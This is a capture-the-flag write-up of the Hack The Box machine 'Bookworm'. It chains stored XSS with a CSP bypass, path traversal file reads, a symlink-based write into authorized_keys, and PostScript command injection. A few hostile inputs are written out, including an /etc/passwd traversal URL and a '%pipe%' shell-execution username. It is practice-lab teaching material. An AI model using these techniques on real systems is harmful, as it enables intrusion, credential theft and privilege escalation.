Bookworm was my first Insane-rated machine, and while many think it was closer to a Hard, if you’re not a fan of JavaScript, this box put you through the ringer. The box is frontloaded with a lengthy and brutal series of XSS/CSRF attacks to discover a hidden download endpoint. The download, under certain circumstances, is vulnerable to path traversal, so we can use it to leak out source code and eventually get a password on the box. I’ll then exploit an internal web app to get file read, but end up pivoting to using another “path traversal”-like vulnerability to write into a symlink and get SSH access as another user. The box ends with a command injection into a PostScript template, which wasn’t necessarily hard to do, but moreso obscure.
Note to self, this writeup has been sitting in the drafts since June 2023, this box has been out for a while.
Recon
nmap
Though it may be Insane, we only have two ports, SSH (22/tcp) and HTTP (80/tcp).
The http-title from the scan indicates a custom domain, so I’ll add it to my /etc/hosts file so everything loads properly.
bookworm.htb
As the name would suggest, this website is for a bookstore.
We can already glean some information from looking at response headers.
We know the website is running on Express.js, and that the Content Security Policy (CSP) is script-src 'self'. This configuration only allows JavaScript to be loaded directly from the site and nowhere else, so even if we can inject JavaScript in any field, it won’t run unless the source is coming from http://bookworm.htb. Before creating an account to interact with the site, I want to do some directory bruteforcing and vhost fuzzing to make sure we know where our assets are. However, we don’t learn too much.
feroxbuster + ffuf
Although I truncated the feroxbuster output, it didn’t find anything we couldn’t find though walking the application.
Shopping for Exploits
I’ll create an account to start testing the shopping app. Interestingly, they ask for a lot more fields than the typical HTB machine.
Once we’re logged in, we’re redirected to /shop. The “Recent Updates” on the sidebar is something that immediately catches my eye. It’s one thing to make your site look nice for cosmetics, it’s another when the feed is being regularly updated with similar names after repeated refreshes.
The /profile page lets us change our username and information at any given time. Although we know that regular XSS won’t work as a result of CSP, we encounter an interesting issue if we stick <script>alert(1)</script> inside our username.
This length check appears to be server-side and applies to basically all of the fields. We can head back to shopping and pick up a copy of Alice’s Adventures in Wonderland. At checkout, we see two more important details.
It appears you used to be able to download PDFs from your order page. If so, there may be room for server-side XSS depending on how PDFs are generated. However, it seems we will not have access to it on our fresh account.
There is a “Note” field in the order, which will likely show up somewhere else. Knowing XSS will not work, I’ll at least test for HTML injection with bold tags.
Once we place the order, we can absolutely see that HTML injection worked.
Shell as frank
Bypassing CSP
At this point, we know a few things:
We have HTML injection in the notes field of an order form.
There is a global feed that all users see, which could mean some kind of client-side attack through there.
In order to get JavaScript to execute (i.e. escalate to XSS), we need to have our own code hosted by bookworm.htb to bypass the Content Security Policy.
I spent some amount of time wandering through the source code of each page and noticed some small information disclosure on the /shop page, when the feed is populated.
Those numbers look a bit high to be order numbers since my most recent one was order 176. However, if we look through some logged HTTP requests using BurpSuite, it seems to line up with the numbering on the individual items in a basket.
Although the numbering is predictable, trying to access /basket/<number> doesn’t give us anything. The only other major function that we haven’t interacted with yet is the avatar upload on /profile. I can successfully upload image files, as one would expect, but trying any other files returns an error: “Sorry, you must upload a JPEG or a PNG!“.
Trying to test upload forms without source code normally requires thorough enumeration of what extensions, MIME Types, magic bytes, etc. are and aren’t allowed. However, I managed to guess what the filter was immediately, by changing the Content-Type header.
Most, if not all, of the requests on this website go through a redirect first, so it’s not immediately obvious that it worked until the default avatar picture went away. Looking at the HTML source, we can confirm that the upload worked by navigating to /static/img/uploads/14.
Now that we have the ability to upload whatever files we want, we can upload JavaScript to be hosted by the box. We can write all of our code into our avatar, and when we need to execute it, we can send a payload like so:
We can send some basic alert() code to the avatar, and then place a new order with our XSS payload to confirm that it works.
Enumerating Other Users’ Orders
It’s great that we have a working XSS proof of concept, but our XSS is completely client-side, which means we need to find a way to get it on other people’s browsers. From our initial recon, we know all of the profile fields have a 20 character limit, which ultimately leaves us needing to get the payload in someone else’s notes. Knowing how the flow of the application goes, it’s worth checking whether or not appropriate access control is in place.
If I try to fuzz other people’s orders with ffuf, I can only see orders that I have made.
Thinking back to the basket numbers we saw in the /shop HTML source, we can try to wait until a new notification pops up, and then send a POST to /basket/<id>/edit in an attempt to change their note to an XSS payload. It’s a rough guess if it’ll work, as all you need to do is simply validate the request with the session cookie, but it’s worth a shot.
I’ll keep refreshing the shop page to see a notification, and once I can grab their basket ID, I’ll send a request like the one below:
I’ll also change the Javascript in my avatar to a simple fetch payload.
After submitting the request, if we do it right, we get a request back at our local webserver.
We can run arbitrary Javascript in anyone’s browser!
Strategy
In the usual XSS challenge, my first instinct would be to steal a cookie, bypass authentication, and move on with life. However, the cookies are marked with HttpOnly, meaning the client side code is not allowed to read the cookie value. This means our next best option is to crawl users’ profiles to see if we can potentially find any sensitive information or literally anything to advance our grasp.
Before continuing, I spent a little time to automate the process of injecting the XSS payloads so I didn’t have to bounce between multiple windows trying to win a race condition. We can automatically insert XSS in other people’s baskets using a few lines of Python.
Increasingly Ugly JavaScript
Now to make the Javascript payload. At this point, we should break down the basic blocks of what we want to do.
I want to get a list of the orders a user has placed so I can read their notes.
Once I have a list of the orders, I want to know exactly what is in those order pages.
If doing this in Javascript seems intimidating, my Hacker Ts writeup gives a primer into making these requests. To get the list of orders a user has placed, we can make a request to /profile, and then parse the inner HTML.
This would probably be much easier to do with regex, but that didn’t cross my mind while I was solving the box. Once we get our orderNumbers, we need to (1) check what’s in those orders, and (2) exfiltrate all of this information to our webserver.
I’ll admit, the code is a bit ugly, but there’s a couple of things we’re balancing here. For one, since XMLHttpRequest works asynchronously, we need to wrangle the requests so we get the data from the first to decide how the second request is made. The req.onreadystatechange does a lot of the heavy lifting there, waiting for the initial request to change before continuing. We stick this in a for loop iterating over our order numbers, and boom! We have a game plan. I’ll also be using my fork of up-http-tool where I automatically decode base64 passed to the b parameter, to make it way easier to look at this stuff.
Looking at the HTML, we don’t find any credentials, but we do find download links.
The message on the orders page actually hints at what has to happen next.
File Read
Users who have been on the site before (i.e. anyone but us) have access to the download endpoint, and we don’t. Accessing the downloads is going to be a little more complex, since we have to get the file, a binary format, back to our machine. After hours of googling, I came up with this solution:
You could also use .blob(), but I really wanted the base64 output so I didn’t have to write a webserver to save it as a file, but I think mine was more complicated than it had to be. 0xdf did this pretty well.
Running this gives us a PDF of the book, but without much else in it. After playing around with this for a while, I eventually found that some users would have access to a “Download Everything” option, with the URL like so:
I forgot to URI encode the base 64, and I cannot be bothered to go back and fix it.
If we try to do directory traversal with a single parameter, it doesn’t give us anything. However, if we insert it with multiple parameters, for instance: http://bookworm.htb/download/7?bookIds=1&bookIds=../../../../etc/passwd, and then look at the zip file…
From here, we can start enumerating different files, unzipping the file we get back. Since every XSS chain takes extremely long to run, we have to be very deliberate about what we submit. My first instinct was to check /proc/self/cmdline:
We could try and guess where index.js is, or we could abuse how the Linux file system stores process data and grab /proc/self/cwd/index.js.
Imports in Express.js are pretty simple, if you see ./utils, that means the file is ./utils.js. ./database, in particular, stands out.
SQL wasn’t accessible from our machine based on nmap, but we can try spraying that password against each user we found in /etc/passwd. Eventually, we find that it works for frank.
Shell as neil
Enumeration
Although we have frank’s password, we cannot run anything as sudo.
However, if we check for all listening ports, we see some new services that weren’t on nmap.
Checking localhost:3000 seems to show the original web app we were working with earlier, but localhost:3001 seems to be a new web app.
If we try to figure out who’s running this web app, we see that it’s probably another user on the box named “neil”.
This service is only listening on the localhost, so I can use SSH tunneling to forward port 3001 on our local machine to 3001 on the remote machine. We can then view the web app in the browser instead of having to run curl commands on the other machine.
Source Code Review
The directory for the source code happens to be /home/neil/converter, which is all world-readable. Instead of trying to read the source code on the target, I’ll start an FTP server on my local machine and move the code over.
Then, I’ll tar the source code in /home/neil/converter, and run a put command in the FTP client.
The web app itself is very minimalistic. We have a single index.js running the server, and a few other directories. Most of them are empty, but calibre/ has a bunch of binaries that all seem related to file conversion.
Reading the source code, the flow of the app is as follows:
A user will upload a file, which will immediately get renamed using uuid, concatenated with the extension the user named the file with. This is placed in the processing/ directory.
The destination is constructed similarly, with the uuid name concatenated with the output file type concatenated to the end. This is then moved to the output/ directory.
/home/neil/converter/calibre/ebook-convert is spawned with only two arguments: the original file and the output file.
If you don’t like reading source code, we also could have used pspy to see what system commands are run upon any request.
Although it seems like command injection might be possible with child.spawn(), since two arguments are explicitly given, even sticking $(whoami) in either of the variables will not actually evaluate- it will be treated like a string. Checking the version using calibre --version tells us it’s version 6.11, which, at the time of writing, has no known vulnerabilities. The usage of Nunjucks might make us think it’s vulnerable to Server-Side Template Injection (SSTI), but since there’s no input that’s being dynamically reflected in the output, that is also a no go. Furthermore, none of the stuff in the source code directory is writeable, so hijacking is also off of the table.
Fail - File Read
I’ve touched on this before in my writeup on Nahamcon’s Hacker T’s, but if we can dynamically create PDF files, we can potentially inject JavaScript and have it execute to read files and make HTTP requests from the server. Doing some testing, it seems that HTML files are supported. Using some of the payloads listed in HackTricks, I’ll try to submit the below payload.
The style isn’t something that HackTricks tells you to do, but in my experience with other challenges, making the iframe bigger makes it a lot easier to read exfiltrated data. Unfortunately, submitting this HTML to be converted to a PDF, we get an error that the result was not found. If we look at the documentation for ebook-convert, we find out why.
This pretty much shuts down the PDF approach, but there’s way many more potential outputs than just PDFs. If we try the same payload against the EPUB format, we don’t get an error. Using Atril Document Viewer to read the file, we don’t really see anything at first. However, the page count says “1 of 2”, and jumping to page 2, we see our file.
As frank, I don’t know all of the files that neil could have. Looking in frank’s .ssh/ directory, I see that the keys are named id_ed25519 after the elliptic curve, so I can try something similar for frank. It appears that frank does have a private key at /home/neil/.ssh/id_ed25519, but when I try to SSH with it, it still prompts me for a password.
I can check to see if there’s an authorized_keys file in the directory, and lo and behold, there isn’t.
Since the app is running as neil, we can only read files that neil can. We could continue to try guessing file names to potentially uncover some hidden credentials, but that feels like a “Hail Mary”. Without anyway to leverage the file read to leak some kind of key or password, there’s not much that this vulnerability provides for us, and we need to go back to the drawing board.
Arbitrary File Write
What is most interesting about this webapp is how the file names are constructed. If we intercept a request with Burp, attempting to convert a PDF to a DOCX, we see this.
Since we’re sending the name of the extension to the server, what if we tampered with it to put the file somewhere else? If we change docx to /../../../../../tmp/arb-write.docx, then the concatenated output becomes /home/neil/converter/output/<UUID STRING>/../../../../../tmp/arb-write.docx. If we modify the request and send this, we get a success response from the server, and more importantly, we see we can write files anywhere neil can.
With a file write, the easiest way to get a shell is to insert a public key into authorized_keys. However, as we identified earlier, neil does not have an authorized_keys file, and we can only write files that have a valid extension. Otherwise, the web app will error out.
On Symlinks
A common theme through these two vulnerabilities we’ve found is that the only validation of the file name is coming from ebook-convert, the binary, and nowhere else. The solution, then, is slightly subversive but makes a ton of sense. Recall that in Linux, symlinks are essentially shortcuts, allowing us to redirect input from one file or directory into another. I can demonstrate this on my local machine, by creating a symlink called /tmp/test/portal.txt into /tmp/test/authorized_keys.
Similarly, if we create a symlink on the system named “portal.txt”, and direct that into neil’s authorized_keys, we won’t be able to write into it as frank. However, using the file write that the web app provides, we can satisfy all of the conditions to put a public key in that file. The easiest way to do this would be to use my own public key, but we can also make a public key out of the private key we exfiltrated.
With that done, we can create a symlink in /tmp/an00b to the authorized_keys file. Once that’s done, we can submit this public key as a txt file, and tamper with the request again to get a file write.
We know our attempt was successful when we see this response in Burp.
We can now SSH as neil.
Shell as root
Enumeration
Running sudo -l as niel immediately points us to a target.
This doesn’t appear to be a traditional Linux binary. If I check the type of file, it turns out it’s a Python script, which we also happen to have read permissions to. Reading the file, we see that it is another PDF generator, this time written in Python.
We already know what the database credentials are from reading the original web app’s source code, and it appears the commented-out lines about printer.bookworm-internal.htb are just flavortext, as that website is not in /etc/hosts.
We can run the Python script just to get an idea of how it works, and then view the output after transferring it back to our own machine.
Looking at the PDF, it looks like it’s just a receipt.
genlabel
The source for genlabel isn’t terribly complicated:
Examining the Python script, there’s two main areas that are big faults. The first one that stands out is SQL injection with the order ID we supply. Our input is just getting subbed into the query using a format string, which means we can inject arbitrary SQL queries (format string != prepared statement). Reusing the SQL credentials from before, however, we can see that the SQL user we have control of does not have very many permissions.
We already have access to the whole SQL database, so anything related to reading or writing to files is off of the table. However, the other major issue is that the code injects our user’s information directly into a .ps file.
If we read the file referenced by the script, and doing some googling, it looks to be a PostScript template, with our information put in the middle.
After doing some research, it appears that PostScript is actually a programming language for stuff like PDFs. According to Wikipedia:
PostScript (PS) is a page description language in the electronic publishing and desktop publishing realm. It is a dynamically typed, concatenative programming language. It was created at Adobe Systems by John Warnock, Charles Geschke, Doug Brotz, Ed Taft and Bill Paxton from 1982 to 1984.
There is absolutely some way to either read/write files or get code execution with this, the challenge is just navigating the 20 character limit on each of the fields. However, since we have SQL injection, we can effectively circumvent that using a UNION statement. The challenge then becomes figuring out how to read and write files in PostScript, because the documentation is not good. This StackOverflow post does a lot of the heavy lifting for us.
This will read from output1.txt, and then write that content to output2.txt. Since all we need is the root flag, we can grab /root/root.txt, but we could also grab files like /etc/shadow, or guess at private key names in /root/.ssh/. It’s also probably possible to turn this into an arbitrary write, but we’ll keep it simple for now. We can use a malformed input to genlabel to return this PostScript, and grab the flag.
Beyond Root
When I originally solved this box, the routes for privilege escalation were much more open, and I’ll cover two here.
Route #1 - Running a Shell Script
The first thing I googled here was “execute system commands postscript”. I eventually fell into the realm of CVEs and saw writeups for CVE-2018-19475 and CVE-2021-3781. To be clear, this version of ps2pdf coming from GhostScript is not vulnerable to any CVEs at the time of writing. However, what was interesting about the CVEs is that they were sandbox escapes that used a particular syntax. The 2018 CVE had a payload like the one below:
The %pipe indicates that the next thing that follows should be treated as a shell command, and the (w) file outputs it to STDOUT. If we look back at the Python script, ps2pdf is being called with the -dNOSAFER flag, meaning there is no sandbox, and we don’t have to worry about it at all. The box has a GhostScript interpreter installed, so we can actually test this payload with id.
Perfect! We have command execution. To confirm this, we can change our username on the bookworm.htb webapp, and run genlabel on the box.
This is cool, but we have one problem. We still face a 20 character limit. While playing around with small commands, I ended up running env and noticed something.
Since we have control of $PWD, we can stick whatever commands we want in an executable shell script, and then call it from a relative path to meet the size requirements. I’ll write a file called a like so:
If I submit %pipe%./a)(w)file as my username, we get an error, but if we list the files in the directory, we see it worked, and get a root shell.
Route #2 - Import Malicious PostScript Template
While helping some other people with root, someone (I closed the DM I’m sorry I forgot your username), showed me that you could import a PostScript template, effectively circumventing the character limit altogether. We could reuse our approach from before to run longer commands without a script file, but for this, I’ll just read files, though writing is also a possibility. This is a very similar approach to the intended solution, except we don’t need SQL injection at all.
The below PostScript will read in root.txt and print that out to STDOUT. I’ll put this in a.ps, naming it that way to reduce payload size.
This PDF from the University of British Colombia explains how to import PS files. We can submit a username of ./a.ps) run( to import the file. When we run genlabel again, we get an error, but we can see the flag in the stack trace, which is good enough for me, although I’m sure there’s a way to do this without throwing an exception.